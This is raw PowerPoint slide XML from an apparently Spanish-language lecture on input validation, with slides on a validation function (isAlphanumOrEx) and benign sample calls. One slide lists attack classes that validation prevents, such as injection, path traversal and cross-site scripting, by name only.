                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                  <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Alfanumérico + .-_</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="es-UY" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="Straight Arrow Connector 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7665C6D0-8C62-9B47-9C23-5C3E40DDD151}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9717359" y="5266998"/>
              <a:ext cx="373698" cy="27538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189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98C20-0E38-0147-B8F3-D036379F9EA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467904" y="0"/>
            <a:ext cx="10870656" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" b="1" dirty="0"/>
              <a:t>Ejemplo de función de validación de entradas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F23FA2D7-A93D-CA4C-B436-AB154E0C59D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="986122"/>
            <a:ext cx="12192000" cy="5317859"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94186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70BF-8FA6-BE45-9844-52452398A071}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" b="1" dirty="0"/>
              <a:t>Algunos ejemplos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32288CDF-F873-8643-A867-76CE07C52673}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952214" y="1690689"/>
            <a:ext cx="10401586" cy="3543464"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="40000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>isAlphanumOrEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="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"true"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>isAlphanumOrEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="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"desc"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>isAlphanumOrEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3200" b="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21845816438168</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="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3200" b="1" dirty="0">
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>isAlphanumOrEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="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"0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3200" b="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0709750fa566</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="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3200" b="1" dirty="0">
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>isAlphanumOrEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3200" b="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Cr2i7nHq6qiMEs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="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3200" b="1" dirty="0">
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>isAlphanumOrEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="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3200" b="1" dirty="0" err="1">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site.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="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3200" b="1" dirty="0">
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">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559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87" name="Google Shape;687;p45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4451674" y="29288"/>
            <a:ext cx="7740326" cy="1325700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000">
              <a:alpha val="0"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="45675" tIns="45675" rIns="45675" bIns="45675" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="C00000"/>
              </a:buClr>
              <a:buSzPts val="3019"/>
              <a:buFont typeface="Cambria Math"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="2400"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sym typeface="Cambria Math"/>
              </a:rPr>
              <a:t>Vulnerabilidades</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:sym typeface="Cambria Math"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:sym typeface="Cambria Math"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:sym typeface="Cambria Math"/>
              </a:rPr>
              <a:t>		F(</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sym typeface="Cambria Math"/>
              </a:rPr>
              <a:t>Entradas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:sym typeface="Cambria Math"/>
              </a:rPr>
              <a:t> / (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:sym typeface="Cambria Math"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:sym typeface="Cambria Math"/>
              </a:rPr>
              <a:t> +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:sym typeface="Cambria Math"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:sym typeface="Cambria Math"/>
              </a:rPr>
              <a:t>Validaciones</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:sym typeface="Cambria Math"/>
              </a:rPr>
              <a:t>))</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              <a:ea typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              <a:cs typeface="Cascadia Code" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              <a:sym typeface="Cambria Math"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="688" name="Google Shape;688;p45" descr="Picture 36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7127309" y="3356976"/>
            <a:ext cx="1054424" cy="2391081"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="689" name="Google Shape;689;p45" descr="Picture 37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8580328" y="3356974"/>
            <a:ext cx="1075674" cy="2391080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="690" name="Google Shape;690;p45" descr="Picture 38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10033347" y="3068876"/>
            <a:ext cx="1075674" cy="2679178"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="691" name="Google Shape;691;p45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7127309" y="1778696"/>
            <a:ext cx="4227535" cy="3003116"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1076" y="101"/>
                  <a:pt x="2151" y="202"/>
                  <a:pt x="2763" y="1286"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3375" y="2371"/>
                  <a:pt x="2926" y="5359"/>
                  <a:pt x="3673" y="6506"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4420" y="7654"/>
                  <a:pt x="6212" y="6904"/>
                  <a:pt x="7245" y="8171"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8278" y="9438"/>
                  <a:pt x="8716" y="12899"/>
                  <a:pt x="9873" y="14110"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11030" y="15320"/>
                  <a:pt x="12232" y="14186"/>
                  <a:pt x="14187" y="15434"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16141" y="16682"/>
                  <a:pt x="18871" y="19141"/>
                  <a:pt x="21600" y="21600"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="41275" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="C00000"/>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2127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F5E78-7777-4CE4-235A-DA871701A4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64A75C-0B16-0B08-9486-FB562F1A0656}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="5400" dirty="0"/>
              <a:t>Ataques prevenidos con la validación de entradas</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="5400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC861086-FF6B-5039-CCF8-38EF2D01F0A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4539530" y="1690688"/>
            <a:ext cx="7034722" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="4400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Inyecciones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="4400" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="4400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="4400" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Traversal</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="4400" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="4400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="4400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Redirección no validada</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="4400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Deserializaciones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="4400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="3600" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB9A718F-E6A4-8A44-2753-51CA12AA83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1540494"/>
            <a:ext cx="3189889" cy="4931229"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379013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6073D-FEDD-9B4A-8597-5093A867C22D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
